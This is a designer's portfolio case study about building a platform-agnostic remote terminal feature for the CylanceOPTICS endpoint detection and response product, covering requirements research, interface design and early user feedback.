Cylance – Enhancing Incident Response

Case Study

Back

CylanceOPTICS is an EDR (Endpoint Detection & Response) product primarily based around threat hunting and root cause analysis when breaches or possible breaches occur in a Companies environment. It consists of a suite of tools to help forensic teams determine how threats got into their network, and remediate them quickly.

Problem to Solve:

When a threat occurs on one or multiple devices a user will need to perform forensic actions upon the device in question like viewing logs, stopping processes and collecting files of interest for further evaluation. Currently, a user will need to remote shell into that system to perform these actions outside of the product across multiple OS's using different software. This is a cumbersome process and takes them out of there investigative workflow.

Goals & Proposed Solution

Create a method for connecting to a device through CylanceOPTICS that retains workflow and is platform agnostic. This solution needs to be secure, fast and inline of the investigative workflow.

  • Provide remote terminal experience
  • Keeping inline workflow is crucial
  • Secure, fast connection
  • Operating System agnostic

Cylance EDR Users

The Remote Response was a new feature in a well defined product, we knew who are users were from previous research. We targeted this user group for feedback and testing throughout the project.

Research for Requirements

An issue that arose from the beginning of the project was the lack of requirements because of the quick time to build this feature as it was a contractual obligation. We created a survey and interviewed internal teams as well as customers to find out what they liked about their current workflow and what could be better. We then collected the data, measured it against users, internal teams and found patterns that stood out.

Design

Defining touchpoints and information architecture was the first step. Then design style derived from standard terminal windows that admins are used to as well as some retro ASCII art to make the feature 'sticky'. Multiple sizes for a user to work in and navigate the app were also implemented.

Inline Workflow

Working within multiple pages and retaining the session was key for users to connect to devices inline of workflow, example shown here.

Feedback

While this is a recently released feature (at the time of adding it here), we were still able to collect some quick feedback with internal teams as well as key customers in order to see what worked, and what could be improved.

  • Users stay logged into app longer
  • Great tool to demo for sales
  • Audit log helpful for admins
  • Need more robust RBAC model
Return To Work

Contact me via the links below: